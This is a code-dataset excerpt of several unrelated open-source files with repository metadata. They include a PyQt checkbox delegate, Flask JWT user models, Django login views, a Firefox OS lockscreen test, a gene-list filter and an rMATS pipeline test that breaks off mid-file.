src/urh/ui/delegates/CheckBoxDelegate.py
|
awesome-archive/urh
|
c8c3aabc9d637ca660d8c72c3d8372055e0f3ec7
|
[
"Apache-2.0"
] | 1 |
2017-06-21T02:37:16.000Z
|
2017-06-21T02:37:16.000Z
|
src/urh/ui/delegates/CheckBoxDelegate.py
|
dspmandavid/urh
|
30643c1a68634b1c97eb9989485a4e96a3b038ae
|
[
"Apache-2.0"
] | null | null | null |
src/urh/ui/delegates/CheckBoxDelegate.py
|
dspmandavid/urh
|
30643c1a68634b1c97eb9989485a4e96a3b038ae
|
[
"Apache-2.0"
] | null | null | null |
from PyQt5.QtCore import QModelIndex, QAbstractItemModel, Qt, pyqtSlot
from PyQt5.QtWidgets import QItemDelegate, QWidget, QStyleOptionViewItem, QCheckBox
class CheckBoxDelegate(QItemDelegate):
def __init__(self, parent=None):
super().__init__(parent)
self.enabled = True
def createEditor(self, parent: QWidget, option: QStyleOptionViewItem, index: QModelIndex):
editor = QCheckBox(parent)
editor.stateChanged.connect(self.stateChanged)
return editor
def setEditorData(self, editor: QCheckBox, index: QModelIndex):
editor.blockSignals(True)
editor.setChecked(index.model().data(index))
self.enabled = editor.isChecked()
editor.blockSignals(False)
def setModelData(self, editor: QCheckBox, model: QAbstractItemModel, index: QModelIndex):
model.setData(index, editor.isChecked(), Qt.EditRole)
@pyqtSlot()
def stateChanged(self):
self.commitData.emit(self.sender())
| 37.692308 | 94 | 0.715306 | 97 | 980 | 7.14433 | 0.443299 | 0.069264 | 0.063492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002503 | 0.184694 | 980 | 26 | 95 | 37.692308 | 0.864831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.1 | 0 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c9666a6d0704c6c5a1d15ed10e9ce79d7670676
| 3,215 |
py
|
Python
|
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
# project/server/models.py
import jwt
import datetime
from project.server import app, db, bcrypt
class User(db.Model):
""" User Model for storing user related details """
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(255), unique=True, nullable=False)
email = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
name = db.Column(db.String(255), nullable=False)
age = db.Column(db.Integer, nullable=False)
address = db.Column(db.Integer(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
admin = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, email, username, password, name, age, address, admin=False):
self.email = email
self.username = username
self.password = bcrypt.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.name = name
self.age = age
self.address = address
self.registered_on = datetime.datetime.now()
self.admin = admin
def encode_auth_token(self, user_id):
"""
Generates the Auth Token
:return: string
"""
try:
payload = {
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=0, seconds=5),
'iat': datetime.datetime.utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class BlacklistToken(db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# Check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
| 32.806122 | 90 | 0.612753 | 368 | 3,215 | 5.211957 | 0.296196 | 0.050052 | 0.062565 | 0.04171 | 0.18561 | 0.163712 | 0.163712 | 0.095933 | 0.095933 | 0.052138 | 0 | 0.009961 | 0.281804 | 3,215 | 97 | 91 | 33.14433 | 0.820702 | 0.080871 | 0 | 0.115942 | 0 | 0 | 0.07058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0.057971 | 0.043478 | 0.014493 | 0.492754 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7ca33bba047d555eff412922059b6da8837f7980
| 270 |
py
|
Python
|
examples/setuptools-rust-starter/tests/test_setuptools_rust_starter.py
|
FriendRat/pyo3
|
5446fe2062cb3bf11bf61bd4a2c58a7ed8b408d2
|
[
"Apache-2.0"
] | 1 |
2021-06-18T16:27:31.000Z
|
2021-06-18T16:27:31.000Z
|
examples/setuptools-rust-starter/tests/test_setuptools_rust_starter.py
|
FriendRat/pyo3
|
5446fe2062cb3bf11bf61bd4a2c58a7ed8b408d2
|
[
"Apache-2.0"
] | 5 |
2021-11-08T22:05:41.000Z
|
2022-03-28T22:07:04.000Z
|
examples/setuptools-rust-starter/tests/test_setuptools_rust_starter.py
|
FriendRat/pyo3
|
5446fe2062cb3bf11bf61bd4a2c58a7ed8b408d2
|
[
"Apache-2.0"
] | null | null | null |
from setuptools_rust_starter import PythonClass, ExampleClass
def test_python_class() -> None:
py_class = PythonClass(value=10)
assert py_class.value == 10
def test_example_class() -> None:
example = ExampleClass(value=11)
assert example.value == 11
| 22.5 | 61 | 0.733333 | 35 | 270 | 5.428571 | 0.514286 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035874 | 0.174074 | 270 | 11 | 62 | 24.545455 | 0.816144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.285714 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7caf56de8045038d74971a889dbed39c31d7bb50
| 1,306 |
py
|
Python
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
BReduardokramer/gaia
|
c00302cdcd435ab193e8365917cfc6abac9e4f2e
|
[
"Apache-2.0"
] | 1 |
2021-11-09T00:27:34.000Z
|
2021-11-09T00:27:34.000Z
|
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
tests/python/gaia-ui-tests/gaiatest/tests/functional/lockscreen/test_lockscreen_unlock_to_camera_with_passcode.py
|
AmyYLee/gaia
|
a5dbae8235163d7f985bdeb7d649268f02749a8b
|
[
"Apache-2.0"
] | null | null | null |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from gaiatest import GaiaTestCase
from gaiatest.apps.lockscreen.app import LockScreen
class TestCameraUnlockWithPasscode(GaiaTestCase):
# Input data
_input_passcode = '7931'
def setUp(self):
GaiaTestCase.setUp(self)
# Turn off geolocation prompt
self.apps.set_permission('System', 'geolocation', 'deny')
self.data_layer.set_setting('lockscreen.passcode-lock.code', self._input_passcode)
self.data_layer.set_setting('lockscreen.passcode-lock.enabled', True)
# this time we need it locked!
self.lockscreen.lock()
self.lock_screen = LockScreen(self.marionette)
def test_unlock_to_camera_with_passcode(self):
# https://github.com/mozilla/gaia-ui-tests/issues/479
camera = self.lock_screen.unlock_to_camera()
self.lock_screen.wait_for_lockscreen_not_visible()
camera.switch_to_camera_frame()
self.assertFalse(camera.is_gallery_button_visible)
camera.tap_switch_source()
camera.wait_for_capture_ready()
self.assertFalse(camera.is_gallery_button_visible)
| 31.095238 | 90 | 0.717458 | 173 | 1,306 | 5.202312 | 0.520231 | 0.026667 | 0.046667 | 0.035556 | 0.195556 | 0.195556 | 0.195556 | 0.1 | 0 | 0 | 0 | 0.010427 | 0.19219 | 1,306 | 41 | 91 | 31.853659 | 0.842654 | 0.238897 | 0 | 0.105263 | 0 | 0 | 0.087221 | 0.061866 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.105263 | false | 0.263158 | 0.105263 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cb2d3d2cb22c43c3c911d744e22c33bc37cdf49
| 1,661 |
py
|
Python
|
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
landing/views.py
|
theflatladder/kyrsovaya
|
d6d661854cd955e544a199e201f325decc360cc1
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render, render_to_response, redirect
from django.contrib import auth
from django.contrib.auth.forms import UserCreationForm
from django.template.context_processors import csrf
from django.http import HttpResponseRedirect
def login(request):
args = {}
args.update(csrf(request))
if request.POST:
username = request.POST.get('username')
password = request.POST.get('password')
user = auth.authenticate(username=username, password=password)
if user is not None:
auth.login(request, user)
return redirect('/main')
else:
args['login_error'] = "Пользователь не найден или пароль введен неверный пароль"
return render_to_response('login.html', args)
else:
return render_to_response('login.html', args)
def reg(request):
auth.logout(request)
error = ''
if request.method == "POST":
newuser_form = UserCreationForm(data = request.POST)
if newuser_form.is_valid():
newuser_form.save()
newuser = auth.authenticate(username = newuser_form.cleaned_data['username'], password = newuser_form.cleaned_data['password1'])
auth.login(request, newuser)
return redirect('/main')
else:
error = 'Проверьте правильность вводимых данных.'
else:
newuser_form = UserCreationForm()
return render(request, 'reg.html', locals() )
def main(request):
return render(request, 'index.html', {'username': auth.get_user(request).username} )
def logout(request):
auth.logout(request)
return HttpResponseRedirect("/login")
| 31.339623 | 140 | 0.668874 | 186 | 1,661 | 5.876344 | 0.327957 | 0.060384 | 0.043916 | 0.040256 | 0.064044 | 0.064044 | 0.064044 | 0 | 0 | 0 | 0 | 0.000777 | 0.225166 | 1,661 | 52 | 141 | 31.942308 | 0.848485 | 0 | 0 | 0.25 | 0 | 0 | 0.123494 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.075 | 0.125 | 0.025 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7cb5817de3a17f08a3afdfbe15a3bbd0fbe2d1d8
| 346 |
py
|
Python
|
setup.py
|
GeorgeDittmar/MarkovTextGenerator
|
df6a56e23051e1f263ba22889dc3b5d0dc03e370
|
[
"Apache-2.0"
] | 1 |
2021-11-26T15:49:31.000Z
|
2021-11-26T15:49:31.000Z
|
setup.py
|
GeorgeDittmar/Mimic
|
df6a56e23051e1f263ba22889dc3b5d0dc03e370
|
[
"Apache-2.0"
] | 1 |
2019-06-24T17:30:41.000Z
|
2019-06-26T04:53:00.000Z
|
setup.py
|
GeorgeDittmar/MarkovTextGenerator
|
df6a56e23051e1f263ba22889dc3b5d0dc03e370
|
[
"Apache-2.0"
] | 2 |
2020-05-04T07:57:17.000Z
|
2021-02-23T05:10:11.000Z
|
#!/usr/bin/env python
from distutils.core import setup
setup(name='Mimik',
version='1.0',
description='Python framework for markov models',
author='George Dittmar',
author_email='georgedittmar@gmail.com',
url='https://www.python.org/sigs/distutils-sig/',
packages=['distutils', 'distutils.command'],
)
| 26.615385 | 55 | 0.65896 | 41 | 346 | 5.536585 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007092 | 0.184971 | 346 | 12 | 56 | 28.833333 | 0.797872 | 0.057803 | 0 | 0 | 0 | 0 | 0.452308 | 0.070769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cb6009fc34f03127073ead641d466f1b2a5c978
| 2,313 |
py
|
Python
|
app/search/hot_eval/hl_reportable.py
|
don4apaev/anfisa
|
2e4bdd83c584c0000f037413ccc1f9067c07fa70
|
[
"Apache-2.0"
] | null | null | null |
app/search/hot_eval/hl_reportable.py
|
don4apaev/anfisa
|
2e4bdd83c584c0000f037413ccc1f9067c07fa70
|
[
"Apache-2.0"
] | null | null | null |
app/search/hot_eval/hl_reportable.py
|
don4apaev/anfisa
|
2e4bdd83c584c0000f037413ccc1f9067c07fa70
|
[
"Apache-2.0"
] | null | null | null |
def evalRec(env, rec):
"""hl_reportable"""
return (len(set(rec.Genes) &
{
'ABHD12',
'ACTG1',
'ADGRV1',
'AIFM1',
'ATP6V1B1',
'BCS1L',
'BSND',
'CABP2',
'CACNA1D',
'CDC14A',
'CDH23',
'CEACAM16',
'CEP78',
'CHD7',
'CIB2',
'CISD2',
'CLDN14',
'CLIC5',
'CLPP',
'CLRN1',
'COCH',
'COL11A2',
'DIAPH1',
'DIAPH3',
'DMXL2',
'DNMT1',
'DSPP',
'EDN3',
'EDNRB',
'EPS8',
'EPS8L2',
'ESPN',
'ESRRB',
'EYA1',
'EYA4',
'GIPC3',
'GJB2',
'GJB6',
'GPSM2',
'GRHL2',
'GRXCR1',
'GSDME',
'HGF',
'HSD17B4',
'ILDR1',
'KCNE1',
'KCNQ1',
'KCNQ4',
'LARS2',
'LHFPL5',
'LOXHD1',
'LRTOMT',
'MARVELD2',
'MIR96',
'MITF',
'MSRB3',
'MT-RNR1',
'MT-TS1',
'MYH14',
'MYH9',
'MYO15A',
'MYO3A',
'MYO6',
'MYO7A',
'OSBPL2',
'OTOA',
'OTOF',
'OTOG',
'OTOGL',
'P2RX2',
'PAX3',
'PDZD7',
'PJVK',
'POU3F4',
'POU4F3',
'PRPS1',
'PTPRQ',
'RDX',
'RIPOR2',
'S1PR2',
'SERPINB6',
'SIX1',
'SLC17A8',
'SLC26A4',
'SLC52A2',
'SLITRK6',
'SMPX',
'SOX10',
'STRC',
'SYNE4',
'TBC1D24',
'TECTA',
'TIMM8A',
'TMC1',
'TMIE',
'TMPRSS3',
'TPRN',
'TRIOBP',
'TUBB4B',
'USH1C',
'USH1G',
'USH2A',
'WFS1',
'WHRN',
}
) > 0)
| 21.027273 | 32 | 0.253783 | 118 | 2,313 | 4.966102 | 0.983051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.118221 | 0.601383 | 2,313 | 110 | 33 | 21.027273 | 0.517354 | 0.00562 | 0 | 0 | 0 | 0 | 0.234858 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009174 | false | 0 | 0 | 0 | 0.018349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7cc20f1f6a53dbfc79dbca785199d6d05868daf1
| 25,440 |
py
|
Python
|
tests/prep_post/test.py
|
Aslic/rmats_turbo_4.1.0
|
c651509a5d32799315054fa37a2210fab2aae5e5
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
tests/prep_post/test.py
|
Aslic/rmats_turbo_4.1.0
|
c651509a5d32799315054fa37a2210fab2aae5e5
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
tests/prep_post/test.py
|
Aslic/rmats_turbo_4.1.0
|
c651509a5d32799315054fa37a2210fab2aae5e5
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
import glob
import os.path
import subprocess
import sys
import unittest
import tests.bam
import tests.base_test
import tests.gtf
import tests.output_parser as output_parser
import tests.test_config
import tests.util
class Test(tests.base_test.BaseTest):
def setUp(self):
super().setUp()
self._test_base_dir = tests.test_config.TEST_BASE_DIR
self._test_dir = os.path.join(self._test_base_dir, 'prep_post')
self._generated_input_dir = os.path.join(self._test_dir,
'generated_input')
self._out_dir = os.path.join(self._test_dir, 'out')
self._prep_1_tmp_dir = os.path.join(self._test_dir, 'tmp_prep_1')
self._prep_2_tmp_dir = os.path.join(self._test_dir, 'tmp_prep_2')
self._post_tmp_dir = os.path.join(self._test_dir, 'tmp_post')
self._dup_input_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_dup_input_bam')
self._dup_prep_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_dup_prep_bam')
self._miss_input_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_miss_input_bam')
self._miss_prep_bam_tmp_dir = os.path.join(self._test_dir,
'tmp_miss_prep_bam')
tests.util.recreate_dirs([
self._generated_input_dir, self._out_dir, self._prep_1_tmp_dir,
self._prep_2_tmp_dir, self._post_tmp_dir,
self._dup_input_bam_tmp_dir, self._dup_prep_bam_tmp_dir,
self._miss_input_bam_tmp_dir, self._miss_prep_bam_tmp_dir,
self._command_output_dir()
])
self._read_type = 'paired'
self._read_length = 50
self._sample_1_bams_path = os.path.join(self._generated_input_dir,
'b1.txt')
self._sample_2_bams_path = os.path.join(self._generated_input_dir,
'b2.txt')
sample_1_bam_replicate_template = os.path.join(
self._generated_input_dir, 'sample_1_rep_{}.bam')
sample_2_bam_replicate_template = os.path.join(
self._generated_input_dir, 'sample_2_rep_{}.bam')
self._sample_1_bams = self._create_sample_1_bams(
self._sample_1_bams_path, sample_1_bam_replicate_template)
self._sample_2_bams = self._create_sample_2_bams(
self._sample_2_bams_path, sample_2_bam_replicate_template)
self._gtf_path = os.path.join(self._generated_input_dir, 'test.gtf')
self._gtf = self._create_gtf(self._gtf_path)
self._sub_steps = [
'prep_1',
'inte_1_fail',
'inte_1_pass',
'prep_2',
'inte_2_fail',
'inte_2_pass',
'post',
'duplicate_input_bam',
'duplicate_prep_bam',
'missing_input_bam',
'missing_prep_bam',
]
self._sub_step = None
def test(self):
for sub_step in self._sub_steps:
self._sub_step = sub_step
self._setup_sub_step()
self._run_test()
def _command_output_dir(self):
return os.path.join(self._test_dir, 'command_output')
def _rmats_arguments(self):
arguments = [
'--gtf',
self._gtf_path,
'--od',
self._out_dir,
'-t',
self._read_type,
'--readLength',
str(self._read_length),
]
if self._sub_step == 'prep_1':
arguments.extend([
'--tmp',
self._prep_1_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--task',
'prep',
])
elif self._sub_step == 'inte_1_fail':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--b2',
self._sample_2_bams_path,
'--task',
'inte',
])
elif self._sub_step == 'inte_1_pass':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--task',
'inte',
'--statoff',
])
elif self._sub_step == 'prep_2':
arguments.extend([
'--tmp',
self._prep_2_tmp_dir,
'--b1',
self._sample_2_bams_path,
'--task',
'prep',
])
elif self._sub_step == 'inte_2_fail':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_2_bams_path,
'--task',
'inte',
'--statoff',
])
elif self._sub_step == 'inte_2_pass':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--b2',
self._sample_2_bams_path,
'--task',
'inte',
])
elif self._sub_step == 'post':
arguments.extend([
'--tmp',
self._post_tmp_dir,
'--b1',
self._sample_1_bams_path,
'--b2',
self._sample_2_bams_path,
'--task',
'post',
])
elif self._sub_step == 'duplicate_input_bam':
arguments.extend([
'--tmp',
self._dup_input_bam_tmp_dir,
'--b1',
self._dup_input_bam_path,
'--task',
'post',
'--statoff',
])
elif self._sub_step == 'duplicate_prep_bam':
arguments.extend([
'--tmp',
self._dup_prep_bam_tmp_dir,
'--b1',
self._dup_prep_bam_path,
'--task',
'post',
'--statoff',
])
elif self._sub_step == 'missing_input_bam':
arguments.extend([
'--tmp',
self._miss_input_bam_tmp_dir,
'--b1',
self._miss_input_bam_path,
'--task',
'post',
'--statoff',
])
elif self._sub_step == 'missing_prep_bam':
arguments.extend([
'--tmp',
self._miss_prep_bam_tmp_dir,
'--b1',
self._miss_prep_bam_path,
'--task',
'post',
'--statoff',
])
return arguments
def _setup_sub_step(self):
if self._sub_step == 'duplicate_input_bam':
self._setup_dup_input_bam()
elif self._sub_step == 'duplicate_prep_bam':
self._setup_dup_prep_bam()
elif self._sub_step == 'missing_input_bam':
self._setup_miss_input_bam()
elif self._sub_step == 'missing_prep_bam':
self._setup_miss_prep_bam()
def _setup_dup_input_bam(self):
self._dup_input_bam_path = os.path.join(self._generated_input_dir,
'dup_input.txt')
bams = self._sample_1_bams + [self._sample_1_bams[0]]
self._write_bams(bams, self._dup_input_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._dup_input_bam_tmp_dir)
def _setup_dup_prep_bam(self):
self._dup_prep_bam_path = os.path.join(self._generated_input_dir,
'dup_prep.txt')
bams = self._sample_1_bams
self._write_bams(bams, self._dup_prep_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._dup_prep_bam_tmp_dir)
self._cp_with_prefix('prep_1_again', self._prep_1_tmp_dir,
self._dup_prep_bam_tmp_dir)
def _setup_miss_input_bam(self):
self._miss_input_bam_path = os.path.join(self._generated_input_dir,
'miss_input.txt')
bams = [self._sample_1_bams[0]]
self._write_bams(bams, self._miss_input_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._miss_input_bam_tmp_dir)
def _setup_miss_prep_bam(self):
self._miss_prep_bam_path = os.path.join(self._generated_input_dir,
'miss_prep.txt')
bams = self._sample_1_bams + self._sample_2_bams
self._write_bams(bams, self._miss_prep_bam_path)
self._cp_with_prefix('prep_1', self._prep_1_tmp_dir,
self._miss_prep_bam_tmp_dir)
def _create_gtf(self, gtf_path):
gtf = tests.gtf.GTF()
gtf.path = gtf_path
transcript_1 = tests.gtf.Transcript()
transcript_1.chromosome = '1'
transcript_1.strand = '+'
transcript_1.gene_id = tests.util.gene_id_str(1)
transcript_1.gene_name = tests.util.gene_name_str(1)
transcript_1.transcript_id = tests.util.transcript_id_str(1)
transcript_1.exons = [(1, 100), (201, 300), (401, 500)]
gtf.transcripts = [transcript_1]
error = gtf.write()
self.assertFalse(error)
return gtf
def _create_sample_1_bams(self, sample_1_bams_path,
sample_1_replicate_template):
rep_1_bam = tests.bam.BAM()
rep_1_bam.path = sample_1_replicate_template.format(1)
rep_2_bam = tests.bam.BAM()
rep_2_bam.path = sample_1_replicate_template.format(2)
sample_1_bams = [rep_1_bam, rep_2_bam]
rep_1_read_1 = tests.bam.Read()
rep_1_read_1.ref_seq_name = '1' # chromosome
rep_1_read_1.ref_seq_len = 1000 # chromosome length
rep_1_read_1.template_name = tests.util.template_name_str([1, 1])
rep_1_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(rep_1_read_1,
rep_1_read_2,
[[76, 100], [201, 300]],
[[401, 475]],
self._read_length)
self.assertFalse(error)
rep_1_bam.reads = [rep_1_read_1, rep_1_read_2]
rep_2_read_1 = tests.bam.Read()
rep_2_read_1.ref_seq_name = '1' # chromosome
rep_2_read_1.ref_seq_len = 1000 # chromosome length
rep_2_read_1.template_name = tests.util.template_name_str([1, 2])
rep_2_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(
rep_2_read_1, rep_2_read_2, [[26, 100]], [[201, 300], [401, 425]],
self._read_length)
self.assertFalse(error)
rep_2_bam.reads = [rep_2_read_1, rep_2_read_2]
self._write_bams(sample_1_bams, sample_1_bams_path)
return sample_1_bams
def _create_sample_2_bams(self, sample_2_bams_path,
sample_2_replicate_template):
rep_1_bam = tests.bam.BAM()
rep_1_bam.path = sample_2_replicate_template.format(1)
rep_2_bam = tests.bam.BAM()
rep_2_bam.path = sample_2_replicate_template.format(2)
sample_2_bams = [rep_1_bam, rep_2_bam]
rep_1_read_1 = tests.bam.Read()
rep_1_read_1.ref_seq_name = '1' # chromosome
rep_1_read_1.ref_seq_len = 1000 # chromosome length
rep_1_read_1.template_name = tests.util.template_name_str([2, 1])
rep_1_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(rep_1_read_1,
rep_1_read_2,
[[76, 100], [401, 500]],
[[401, 475]],
self._read_length)
self.assertFalse(error)
rep_1_bam.reads = [rep_1_read_1, rep_1_read_2]
rep_2_read_1 = tests.bam.Read()
rep_2_read_1.ref_seq_name = '1' # chromosome
rep_2_read_1.ref_seq_len = 1000 # chromosome length
rep_2_read_1.template_name = tests.util.template_name_str([2, 2])
rep_2_read_2 = tests.bam.Read()
error = tests.bam.set_read_pair_from_intervals(rep_2_read_1,
rep_2_read_2,
[[26, 100]],
[[1, 100], [401, 425]],
self._read_length)
self.assertFalse(error)
rep_2_bam.reads = [rep_2_read_1, rep_2_read_2]
self._write_bams(sample_2_bams, sample_2_bams_path)
return sample_2_bams
def _cp_with_prefix(self, prefix, source_dir, dest_dir):
source_paths = self._get_dot_rmats_paths(source_dir)
command = [
sys.executable, tests.test_config.CP_WITH_PREFIX, prefix, dest_dir
]
command.extend(source_paths)
subprocess.run(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True)
def _check_results(self):
if self._sub_step == 'prep_1':
self._check_results_prep_1()
elif self._sub_step == 'inte_1_fail':
self._check_results_inte_1_fail()
elif self._sub_step == 'inte_1_pass':
self._check_results_inte_1_pass()
elif self._sub_step == 'prep_2':
self._check_results_prep_2()
elif self._sub_step == 'inte_2_fail':
self._check_results_inte_2_fail()
elif self._sub_step == 'inte_2_pass':
self._check_results_inte_2_pass()
elif self._sub_step == 'post':
self._check_results_post()
elif self._sub_step == 'duplicate_input_bam':
self._check_results_dup_input_bam()
elif self._sub_step == 'duplicate_prep_bam':
self._check_results_dup_prep_bam()
elif self._sub_step == 'missing_input_bam':
self._check_results_miss_input_bam()
elif self._sub_step == 'missing_prep_bam':
self._check_results_miss_prep_bam()
else:
self.fail('unexpected sub_step: {}'.format(self._sub_step))
def _get_dot_rmats_paths(self, tmp_dir):
dot_rmats_file_paths = glob.glob(os.path.join(tmp_dir, '*.rmats'))
# filenames begin with a timestamp used for alphanumeric sort
return sorted(dot_rmats_file_paths)
def _check_results_prep_1(self):
self._check_no_error_results()
command_stdout_file_name = self._get_stdout_file_name()
with open(command_stdout_file_name, 'rt') as out_f_h:
out_lines = out_f_h.readlines()
tests.util.assert_no_line_has(self, out_lines,
'Processing count files')
test_gene_id = tests.util.gene_id_str(1)
quoted_test_gene_id = tests.util.double_quote(test_gene_id)
dot_rmats_paths = self._get_dot_rmats_paths(self._prep_1_tmp_dir)
self.assertEqual(len(dot_rmats_paths), 2)
for dot_rmats_i in range(2):
dot_rmats_contents, error = output_parser.parse_dot_rmats(
dot_rmats_paths[dot_rmats_i])
self.assertFalse(error)
self.assertEqual(dot_rmats_contents['bams'],
[self._sample_1_bams[dot_rmats_i].path])
self.assertEqual(dot_rmats_contents['read_length'],
self._read_length)
novel_juncs = dot_rmats_contents['novel_juncs']
self.assertEqual(novel_juncs, [dict()])
exons = dot_rmats_contents['exons']
if dot_rmats_i == 0:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [401, 499],
'end_box': [401, 499],
'counts': [1, 0]
}]
}])
else:
self.assertEqual(exons, [{
quoted_test_gene_id: [{
'start_box': [1, 99],
